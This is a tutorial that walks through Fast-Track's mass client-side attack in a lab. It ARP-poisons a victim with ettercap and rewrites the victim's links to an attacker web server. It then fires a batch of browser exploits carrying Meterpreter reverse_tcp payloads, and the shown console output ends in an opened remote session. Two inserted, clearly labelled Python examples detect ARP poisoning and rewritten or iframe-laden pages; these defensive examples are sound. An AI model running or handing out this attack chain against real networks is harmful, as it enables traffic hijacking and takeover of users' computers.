Mass-Client Attack
Fast-Track's 'Mass Client-Side Attack' is similar in nature to Metasploit's db_autopwn. When a user connects to your malicious website, a slew of both custom exploits developed in Fast-Track and the army of exploits in Metasploit's repository will be launched at the client. One thing to add is that you can also use ARP cache poisoning with ettercap in order to force the victim to your site! Let's try this out.

Fast-Track Main Menu:
Fast-Track - Where it's OK to finish in under 3 minutes...
Version: v4.0
Written by: David Kennedy (ReL1K)
http://www.securestate.com
http://www.thepentest.com
1. Fast-Track Updates
2. Autopwn Automation
3. Microsoft SQL Tools
4. Mass Client-Side Attack
5. Exploits
6. Binary to Hex Payload Converter
7. Payload Generator
8. Fast-Track Tutorials
9. Fast-Track Changelog
10. Fast-Track Credits
11. Exit
Enter the number: 4
Metasploit path not defined, you should run setup.py, using the default for now...
Mass Client Client Attack
Requirements: PExpect
Metasploit has a bunch of powerful client-side attacks available in
its arsenal. This simply launches all client side attacks within
Metasploit through msfcli and starts them on various ports
and starts a custom HTTP server for you, injects a new index.html
file, and puts all of the exploits in iframes.
If you can get someone to connect to this web page, it will basically
brute force various client side exploits in the hope one succeeds.
You'll have to monitor each shell if one succeeds.. Once finished,
just have someone connect to port 80 for you and if they are vulnerable
to any of the exploits...should have a nice shell.
Enter the IP Address you want the web server to listen on: 10.211.55.130
Specify your payload:
1. Windows Meterpreter Reverse Meterpreter
2. Generic Bind Shell
3. Windows VNC Inject Reverse_TCP (aka "Da Gui")
4. Reverse TCP Shell
Enter the number of the payload you want: 1
Would you like to use ettercap to ARP poison a host yes or no: yes
Ettercap allows you to ARP poison a specific host and when they browse
a site, force them to use the metasploit site and launch a slew of
exploits from the Metasploit repository. ETTERCAP REQUIRED.
What IP Address do you want to poison: 10.211.55.128
Setting up the ettercap filters....
Filter created...
Compiling Ettercap filter...
etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA
12 protocol tables loaded:
DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
11 constants loaded:
VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
Parsing source file 'bin/appdata/fasttrack.filter' done.
Unfolding the meta-tree done.
Converting labels to real offsets done.
Writing output to 'bin/appdata/fasttrack.ef' done.
-> Script encoded into 16 instructions.
Filter compiled...Running Ettercap and poisoning target...
Setting up Metasploit MSFConsole with various exploits...
If an exploit succeeds, type sessions -l to list shells and sessions -i
to interact...
Have someone connect to you on port 80...
Launching MSFConsole and Exploits...
Once you see the Metasploit Console launch all the exploits have someone
connect to you..
SRVPORT => 8072
resource> set URIPATH /
URIPATH => /
resource> set LPORT 9072
LPORT => 9072
resource> exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Exploit running as background job.
resource> use exploit/windows/browser/zenturiprogramchecker_unsafe
[*] Started reverse handler
resource> set PAYLOAD windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8071/
PAYLOAD => windows/meterpreter/reverse_tcp
resource> set LHOST 10.211.55.130
LHOST => 10.211.55.130
[*] Local IP: http://10.211.55.130:8071/
resource> set SRVPORT 8073
[*] Server started.
SRVPORT => 8073
resource> set URIPATH /
URIPATH => /
resource> set LPORT 9073
LPORT => 9073
resource> exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:8072/
[*] Local IP: http://10.211.55.130:8072/
[*] Server started.
msf exploit(zenturiprogramchecker_unsafe) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8073/
[*] Local IP: http://10.211.55.130:8073/
[*] Server started.

At this point when our poor victim at 10.211.55.128 goes to browse ANY website, all the hrefs will be replaced with our website address. Check it out below.
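From the defender's side, the ettercap step above leaves a clear trace on the segment: the attacker's MAC starts answering ARP for addresses it does not own. The following is an added example, not code from Fast-Track or from the original page; it is a small watcher that keeps the IP-to-MAC bindings seen in ARP replies and alerts on a binding flip or on one MAC claiming several IPs. The ArpReply shape, the gateway at 10.211.55.1 and all MAC addresses are assumptions; the sample replies are constructed.

```python
"""Detect ARP cache poisoning from a stream of ARP replies.

Added example; this is not code from Fast-Track or the original page.
The watcher remembers which MAC address each IP has claimed and alerts when
an IP suddenly answers from a different MAC, or when one MAC claims several
IPs at once. A poisoning run like the one above produces exactly that: the
attacker's MAC starts answering for both the gateway and the victim.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    """One ARP 'is-at' reply as a sniffer would hand it over (assumed shape)."""
    sender_ip: str
    sender_mac: str
    target_ip: str


class ArpWatcher:
    def __init__(self, trusted=None):
        # Known-good IP -> MAC bindings (e.g. the gateway from an inventory record).
        self.ip_to_mac = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
        self.mac_to_ips = defaultdict(set)
        for ip, mac in self.ip_to_mac.items():
            self.mac_to_ips[mac].add(ip)
        self.alerts = []

    def observe(self, reply):
        """Record one reply and return the alerts it triggered (possibly none)."""
        new_alerts = []
        ip, mac = reply.sender_ip, reply.sender_mac.lower()
        known = self.ip_to_mac.get(ip)
        if known is not None and known != mac:
            # The binding flipped: either a legitimate NIC swap or a poisoned entry.
            new_alerts.append(f"ip-changed {ip}: {known} -> {mac} (sent to {reply.target_ip})")
            self.mac_to_ips[known].discard(ip)
        self.ip_to_mac[ip] = mac
        if ip not in self.mac_to_ips[mac]:
            self.mac_to_ips[mac].add(ip)
            if len(self.mac_to_ips[mac]) > 1:
                # One interface answering for several hosts is the poisoner's signature.
                new_alerts.append(f"mac-multi {mac}: {sorted(self.mac_to_ips[mac])}")
        self.alerts.extend(new_alerts)
        return new_alerts


# Constructed sample traffic. The IPs mirror the page's lab (gateway assumed at
# .1, victim at .128, attacker at .130); the MAC addresses are made up.
GATEWAY_MAC = "00:1c:42:00:00:01"
VICTIM_MAC = "00:1c:42:00:00:80"
ATTACKER_MAC = "00:1c:42:00:00:82"

SAMPLE_REPLIES = [
    ArpReply("10.211.55.1", GATEWAY_MAC, "10.211.55.128"),    # normal gateway reply
    ArpReply("10.211.55.128", VICTIM_MAC, "10.211.55.1"),     # normal victim reply
    ArpReply("10.211.55.1", ATTACKER_MAC, "10.211.55.128"),   # attacker poses as gateway
    ArpReply("10.211.55.128", ATTACKER_MAC, "10.211.55.1"),   # attacker poses as victim
]


def run_sample():
    """Feed the constructed replies through a watcher seeded with the gateway binding."""
    watcher = ArpWatcher(trusted={"10.211.55.1": GATEWAY_MAC})
    for reply in SAMPLE_REPLIES:
        watcher.observe(reply)
    return watcher.alerts


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

In practice the replies come from a capture on the segment being watched, and the trusted gateway binding should come from an authoritative source such as the switch or DHCP records rather than from the first reply seen. The watcher only sees the broadcast domain it is attached to, which matches the page's own note that the poisoning itself only reaches hosts in the same subnet; on the network side, static ARP entries for the gateway or a switch's dynamic ARP inspection stop the poison from taking effect at all.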

Notice in the bottom left hand corner that the link points to our malicious website on 10.211.55.130. All of the links on Google have successfully been replaced. As soon as a link is clicked, the mayhem begins.
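Both halves of the attack leave a recognisable shape in the HTML the victim receives: the filter rewrites every link on a legitimate page to one foreign host, and the landing page itself is a set of iframes pointing at one host on several ports (8071, 8072, 8073 above, one exploit server each). The following is an added example and not code from Fast-Track or the original page: a page inspector that applies those two heuristics, written so it could sit behind a proxy or in an IDS content check. The thresholds, the sample markup and the use of www.google.com as the serving host are my own choices, not values from the page.

```python
"""Flag HTML that looks like a rewritten page or a mass client-side landing page.

Added example; not code from Fast-Track or the original page. It applies two
heuristics drawn from the behaviour described above: (1) nearly every link on
a page points at one host that is not the site the page came from (what the
ettercap filter produces), and (2) a page embeds iframes to one host across
several distinct ports (one exploit server per port). The thresholds are my
own choices, not values from the page.
"""
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _LinkCollector(HTMLParser):
    """Gather <a href> and <iframe src> values from a document."""

    def __init__(self):
        super().__init__()
        self.hrefs = []
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and attrs.get("href"):
            self.hrefs.append(attrs["href"])
        elif tag == "iframe" and attrs.get("src"):
            self.iframes.append(attrs["src"])


def _host_port(url):
    """(host, port) for an absolute URL, or None for a relative/non-network one."""
    parts = urlsplit(url)
    if not parts.hostname:
        return None
    try:
        port = parts.port
    except ValueError:  # malformed port; treat as not inspectable
        return None
    return parts.hostname, port or (443 if parts.scheme == "https" else 80)


def inspect_page(html, serving_host, min_links=5, min_ratio=0.9, min_iframe_ports=3):
    """Return a list of findings for a page that was served by serving_host."""
    collector = _LinkCollector()
    collector.feed(html)
    findings = []

    # Heuristic 1: links herded off-site to a single host.
    total = len(collector.hrefs)
    if total >= min_links:
        off_site = Counter(
            hp[0] for hp in map(_host_port, collector.hrefs) if hp and hp[0] != serving_host
        )
        if off_site:
            host, n = off_site.most_common(1)[0]
            if n >= min_ratio * total:
                findings.append(f"{n} of {total} links point at {host} rather than {serving_host}")

    # Heuristic 2: iframes fanning out across several ports on one host.
    ports_by_host = {}
    for hp in map(_host_port, collector.iframes):
        if hp:
            ports_by_host.setdefault(hp[0], set()).add(hp[1])
    for host, ports in sorted(ports_by_host.items()):
        if len(ports) >= min_iframe_ports:
            findings.append(f"{len(ports)} iframes to {host} on ports {sorted(ports)}")
    return findings


# Constructed samples, not captured traffic. The attacker address and the
# 8071-8073 exploit ports come from the page's session; the markup is made up.
REWRITTEN_SEARCH_PAGE = """<html><body>
<a href="http://10.211.55.130/">Result 1</a>
<a href="http://10.211.55.130/">Result 2</a>
<a href="http://10.211.55.130/">Result 3</a>
<a href="http://10.211.55.130/">Result 4</a>
<a href="http://10.211.55.130/">Result 5</a>
</body></html>"""

LANDING_PAGE = """<html><body>
<iframe src="http://10.211.55.130:8071/"></iframe>
<iframe src="http://10.211.55.130:8072/"></iframe>
<iframe src="http://10.211.55.130:8073/"></iframe>
</body></html>"""

NORMAL_PAGE = """<html><body>
<a href="/search?q=1">one</a> <a href="https://www.example.com/about">two</a>
<a href="/help">three</a> <a href="/imghp">four</a> <a href="/maps">five</a>
</body></html>"""


if __name__ == "__main__":
    print(inspect_page(REWRITTEN_SEARCH_PAGE, "www.google.com"))
    print(inspect_page(LANDING_PAGE, "10.211.55.130"))
    print(inspect_page(NORMAL_PAGE, "www.google.com"))
```

The first heuristic depends on knowing which host actually served the page, so it belongs wherever that fact is reliable (a proxy, not the page itself). Neither heuristic is needed once the site is served over HTTPS, because an in-path filter cannot rewrite an authenticated response; that is the mitigation that removes the link-rewriting step outright.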
[*] Sending Adobe Collab.getIcon() Buffer Overflow to 10.211.55.128:1044...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 10.211.55.128:1047...
[*] Sending Adobe JBIG2Decode Memory Corruption Exploit to 10.211.55.128:1046...
[*] Sending exploit to 10.211.55.128:1049...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 10.211.55.128:1076...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (10.211.55.130:9007 -> 10.211.55.128:1077)
msf exploit(zenturiprogramchecker_unsafe) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 10.211.55.130:9007 -> 10.211.55.128:1077
msf exploit(zenturiprogramchecker_unsafe) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >

Note that ARP cache poisoning will only work on systems in the same subnet as you. This was a great example of how to "force" a user to browse to your site instead of having to entice them to click on a link, and automatically exploit them with a variety of attacks.

